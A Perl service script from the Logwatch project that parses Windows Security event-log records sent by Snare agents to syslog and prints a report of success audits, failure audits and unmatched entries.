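##########################################################################
# $Id: evtsecurity,v 1.3 2008/06/30 23:07:51 kirk Exp $
##########################################################################
# $Log: evtsecurity,v $
# Revision 1.3 2008/06/30 23:07:51 kirk
# fixed copyright holders for files where I know who they should be
#
# Revision 1.2 2008/03/24 23:31:26 kirk
# added copyright/license notice to each script
#
# Revision 1.1 2007/04/28 22:50:24 bjorn
# Added files for Windows Event Log, by Orion Poplawski. These are for
# Windows events logged to a server, using Snare Agent or similar.
##########################################################################
########################################################
## Copyright (c) 2008 Orion Poplawski
## Covered under the included MIT/X-Consortium License:
## http://www.opensource.org/licenses/mit-license.php
## All modifications and contributions by other persons to
## this script are assumed to have been donated to the
## Logwatch project and thus assume the above copyright
## and licensing terms. If you want to make contributions
## under your own copyright or a different license this
## must be explicitly stated in the contribution an the
## Logwatch project reserves the right to not accept such
## contributions. If you have made significant
## contributions to this script and want to claim
## copyright please contact logwatch-devel@lists.sourceforge.net.
#########################################################

# Logwatch service script: summarize Windows Security event-log records
# that a Snare agent (version 3 or 4 line format) forwarded to syslog.
#
# Input : one syslog line per record on STDIN.
# Output: a Logwatch-style text report on STDOUT; lines that match neither
#         Snare format are reported on STDERR and skipped.
# Detail: LOGWATCH_DETAIL_LEVEL gates the "Success Audits" section only.
#
# The report echoes field values and whole unparsed lines verbatim. They
# come from the remote agents, so a reader of the report should treat
# that text as untrusted log content, not as something this script
# validated.

use strict;
use warnings;

my $Detail = $ENV{'LOGWATCH_DETAIL_LEVEL'} || 0;

my $SuccessAudits = 0;       # count of "Success Audit" records
my %SuccessAuditUsers;       # user name -> count of its success audits
my %FailureAudits;           # "<host> <expanded string>" -> count
my %OtherList;               # records with any other EventLogType -> count

while (defined(my $ThisLine = <STDIN>)) {
   my ($Hostname, $Criticality, $SourceName, $DateTime, $EventID,
       $SourceName2, $UserName, $SIDType, $EventLogType, $CategoryString,
       $DataString, $ExpandedString, $Extra);

   # Determine the agent format from the record marker:
   #   Snare 4 writes "MSWinEventLog[<n>]:", Snare 3 writes "MSWinEventLog\t<n>\t".
   # After the marker both formats are tab-separated; the trailing fields
   # are optional, hence the "\t?([^\t]*)" groups.
   if ($ThisLine =~ /MSWinEventLog\[/) {
      # Snare 4
      ($Criticality, $SourceName, $DateTime, $EventID, $SourceName2,
       $UserName, $SIDType, $EventLogType, $Hostname, $CategoryString,
       $DataString, $ExpandedString, $Extra)
         = ($ThisLine =~ /MSWinEventLog\[(\d+)\]:(\w+)\t\d+\t([^\t]+)\t(\d+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)/);
   }
   elsif ($ThisLine =~ /MSWinEventLog\t/) {
      # Snare 3
      ($Criticality, $SourceName, $DateTime, $EventID, $SourceName2,
       $UserName, $SIDType, $EventLogType, $Hostname, $CategoryString,
       $DataString, $ExpandedString, $Extra)
         = ($ThisLine =~ /MSWinEventLog\t(\d+)\t(\w+)\t\d+\t([^\t]+)\t(\d+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)/);
   }

   # A failed (or absent) match leaves every capture undef; $Hostname is a
   # required group in both patterns, so it stands in for "parsed OK".
   if (!defined($Hostname)) {
      print STDERR "Cannot parse $ThisLine";
      next;
   }

   if ($EventLogType eq "Success Audit") {
      $SuccessAudits++;
      $SuccessAuditUsers{$UserName}++;
   }
   elsif ($EventLogType eq "Failure Audit") {
      $FailureAudits{"$Hostname $ExpandedString"}++;
   }
   else {
      # Anything else is kept whole so it shows up under "Unmatched entries".
      chomp($ThisLine);
      $OtherList{$ThisLine}++;
   }
}

# Keys are sorted so the report is stable from run to run (hash order is not).
if ($SuccessAudits and ($Detail >= 0)) {
   print "\nSuccess Audits " . $SuccessAudits . " Time(s)\n";
   for my $User (sort keys %SuccessAuditUsers) {
      print "   $User : $SuccessAuditUsers{$User} Times\n";
   }
}

if (keys %FailureAudits) {
   print "\nFailure Audits\n";
   for my $Error (sort keys %FailureAudits) {
      print "   $Error : $FailureAudits{$Error} Times\n";
   }
}

# Previously an exit(0) sat here, which made this section unreachable and
# silently dropped every record that was neither a success nor a failure
# audit. Reporting them is the Logwatch convention and is what lets an
# operator notice event types the script does not yet classify.
if (keys %OtherList) {
   print "\n**** Unmatched entries ****\n";
   for my $Error (sort keys %OtherList) {
      print "   $Error : $OtherList{$Error} Times\n";
   }
}

exit(0);

# vi: shiftwidth=3 tabstop=3 syntax=perl et
# Local Variables:
# mode: perl
# perl-indent-level: 3
# indent-tabs-mode: nil
# End: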